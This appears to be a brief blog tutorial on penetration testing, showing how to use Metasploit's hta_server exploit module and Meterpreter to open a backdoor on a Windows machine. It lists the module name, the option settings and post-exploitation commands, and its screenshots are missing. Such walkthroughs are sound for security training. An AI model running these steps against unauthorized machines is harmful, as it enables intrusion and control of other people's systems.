METASPLOIT


Overview:

Metasploit is an open source penetration testing tool. It has a database of public exploits and vulnerabilities . it can execute remlote attacks after gaining root access.

Here I will show how to use metasploit and meterpreter to gain access to windows machine

Steps:

To open up metasploit the command is “msfconsole”

Checking ip of windows machine

Now to attack  windows machine.

  • One of the known vulnerability of windows is hta server. It is an html application but with right payload it can be used  to open a backdoor to a system

Accessing the application by using command “use exploit windows/misc/hta_server”

Checking options to set:

Checking ip of Attackers machine

Setting Lhost Srvhost and Lport according to attackers machine

Launching the payload

When Opening the URL in browser , it automatically downloads a file

Opening up and running file

Now here we can see, it is delivering payload 

The screenshot shows the amount of data that has been sent

Now using command “sessions –i” to check where the session has been sent

“sysinfo” command is showing the name of machine, OS, Architecture etc

“help” command shows what are things that we can set out of system

All the commands that we can run on normal windows cmd , we can run here now 

Now Confirming ip:

Leave a Reply

Your email address will not be published. Required fields are marked *